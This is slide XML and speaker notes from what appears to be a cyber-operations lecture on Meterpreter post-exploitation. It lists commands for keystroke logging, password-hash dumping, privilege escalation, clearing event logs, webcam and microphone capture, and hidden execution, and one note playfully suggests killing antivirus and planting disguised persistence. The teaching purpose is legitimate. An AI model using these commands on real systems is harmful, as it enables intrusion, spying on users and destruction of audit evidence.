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Keystroke recording!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use this command set, you must first migrate your process over to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> process. The process you are attached to must be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (find with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps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Keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can then be used to start the capture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used to dump the currently captured keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Keyscan_stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used to stop the capture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setup for this command is the same as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keyscanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. (migrate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>explorer.exe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some of the user interface components </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once connected to this you can type in any of the variations of the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uictl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> disable/enable mouse/keyboard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use, just type screenshot at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prompt, and a screenshot will be taken and a window will open with the result.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another rather self explanatory command, it dumps the hashes for the system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To use, just type in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will output the hashes, which can then be fed into JTR or a similar program, or even a rainbow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is used to attempt to get to a system level user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is used by just typing in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getsystem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System is the highest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> you can get on a windows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is used to enumerate all available desktops on the system. This can be just the console (session 0) or remote connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default would be the logged in screen where the user could interact with various apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disconnect is the screensaver, or locked window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Winlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the screen that the user logs on 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enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>desktops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> can be used in conjunction with “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>getdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Getdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>finds the desktop that is associated with the current session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A majority of the time, this will default to the Default desktop on session 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The point here is that each desktop has it’s own keyboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> buffer….so if you want to sniff normal stuff the user does on the desktop you have to be in the right desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>If you want to sniff the logon password you need to change the active desktop to 0\WinSta0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>WinLogon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finds the amount of time the user on the target machine has been idle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This could be extremely useful for finding if the user is sitting there, or if it just an idle machine.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85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is used to run scripts that are pre included with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or ones that you create yourself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A much more advanced one is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getgui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which can create a new user with a password and enable a remote desktop connection (RDP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just stop to think about some things you could do here---without even getting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> too crazy…kill </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>av</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, schedule a service to open every 5 minutes or 1 hour or month…call it “backup”, etc…add a user and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>rdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>LOADS of fun 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2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running that script, you could then go in and connect with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdesktop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command in the regular bash shell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the shell command in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will drop you into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prompt on the target machine based on the user level you are currently sitting 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command clears out the event log of the machine so no previous activity would be shown in the logs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NOTE!  Not very stealthy…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executes an exe file on the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be used to do a large variety of things, such as start an FTP server, FTP client, create a backdoor using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and many other things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The processes created can additionally be hidden from the user on the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; execute –f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>calc.exe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Webcam_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Lists the webcams available on the target machine to snap pictures from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> takes a snapshot from the webcam itself and displays it to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Record_mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> records audio for a specified amount of time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of these obviously require a webcam and/or microphone to be usable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2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LOCAL people---local (so you need to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> upload a file?  Move into it locally)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lcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: changes the local working directory, works exactly like regular cd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: gets the local working directory, exactly like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwd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Getlwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: identical to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lpwd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3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used to search for files on the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wildcard characters can be used to search for file types or other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; search –f SAM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2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in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> VI: --- “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>” to insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Make your changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Esc key to escape, then “:” “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>wq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>” to write and quit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1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Downloads any file or directory on the target system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax is just “download [source] [destination]”, but the destination is not needed; it defaults to the current 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used to upload files from your local machine running the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> console on up to the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Location can be chosen with the directory commands previous found as well as specifying location in the command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Ok---so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> this lecture is basically a series of demos on Meterpreter.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> ROCKS --- you NEED to spend time with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>.  Understand it.  Love it.  Get cozy with it.  It will become your BEST FRIEND.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1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Shows the routing tables on the target machine.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6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3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Puts the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session into background mode and allows you to come back for more later!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3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shutdown doesn’t work --- migrate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>svchost.exe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you’ve got a Meterpreter shell… now what???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Can you find it on the victim?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>  (how do you see the current processes?)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>…view processes…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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for the system that you are currently sitting on (probably already have this info by now, at least most of it)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ran just by typing in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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AutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="en-US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is used to get the list of processes running on the target machine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The different columns are as follows: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PID: The process ID of the item on that line, used with other commands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Name: The name of the process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for example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Arch: The architecture that the service is running on (32 or 64 bit)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Session: The session on the victim that the service is running on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User: The user level the service is running as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Path: The path to the actual executable that was used to start that service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This is going to be KEY for what?  MIGRATION!  Remember---we usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> want to quickly migrate to a more stable environment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3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use the command, just type in kill (PID), obviously substituting the appropriate PID in that you want.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> do we get the PID!  (previous slide!)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one of the most popular and most useful features --- migrate!  Move your shell to another process!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self explanatory, this command ---displays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the current PID (of the processes you’re running)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gets the username, or UID, that is associated with the current Meterpreter session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This command is used by just typing in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getuid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C32F-B0B8-094F-8295-DFAF21E577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Cyber Operations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10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="20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Meterpreter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meterpreter &gt; keyscan_start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Starts keystroke recording</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; keyscan_dump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Dumps the current users keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; keyscan_stop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stops recording user keystrokes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08205"/>
            <a:ext cx="3529546" cy="2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7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uictl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Provides the ability to disable / enable input (keyboard and mouse)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; uictl disable mouse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; uitcl enable mouse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16" y="3829051"/>
            <a:ext cx="477403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2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Takes a screenshot of the target machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; screenshot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18891"/>
            <a:ext cx="2971800" cy="299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3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Grabs and displays the native hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; hashdump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71950"/>
            <a:ext cx="662123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7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Attempts to elevate privileges to system level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; getsystem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564082"/>
            <a:ext cx="490289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enumdesktops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Allows attacker to interact with all available desktops on the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; enumdesktops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200400"/>
            <a:ext cx="34000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9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the desktop that is currently active</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; getdesktop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886201"/>
            <a:ext cx="4819136" cy="85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9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idletime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how much time the user has been inactive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; idletime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15" y="4400550"/>
            <a:ext cx="451158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6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Allows the execution of ruby scripts (pre-packaged or self developed) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>checkvm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>credcollect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>getcountermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>getgui</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>killav</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>scheduleme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; run &lt;script&gt;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getgui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770301"/>
            <a:ext cx="7886700" cy="246198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22" y="3283073"/>
            <a:ext cx="4781479" cy="27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Determine the most useful commands to use in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> when presented with a target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain the functionality of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command shell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Provides an interactive Windows OS shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; shell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943350"/>
            <a:ext cx="41939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7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Clears event and security logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; clearev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932636"/>
            <a:ext cx="4916405" cy="12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0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Executes the specified file on the target </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-H creates the process as hidden from view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-a allows you to pass required arguments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>-i interact with the process after starting it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; execute –f &lt;file&gt; &lt;options&gt;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08" y="3761313"/>
            <a:ext cx="3594392" cy="22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Webcam_list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; webcam_list </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Webcam_snap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; webcam_snap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Record_mic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; record_mic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6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Directory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lcd: changes the local working directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>lpwd: gets the local working directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>getlwd: identical to lpwd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57" y="4073236"/>
            <a:ext cx="2228850" cy="165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2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File System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cd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>changes directory on the remote machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>del</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>deletes a file specified in command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>rm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>identical to del</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>rmdir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> removes a specified directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>mkdir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>creates a new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Allows you to search remote machine for specific files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; search –f &lt;file_name or wildcard&gt;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318272"/>
            <a:ext cx="6485486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61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file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cat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>prints the contents of a specified file to the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>edit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Allows you to edit text using an editor similar to vi</a:t>
            </a:r>
          </a:p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057650"/>
            <a:ext cx="3588589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6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Download a file from the target to the host </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; download &lt;src file&gt; &lt;dest file&gt;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343401"/>
            <a:ext cx="4753692" cy="8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6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Upload a file to the target host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>meterpreter &gt; upload &lt;scr file&gt; &lt;dest file&gt;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8" y="4400550"/>
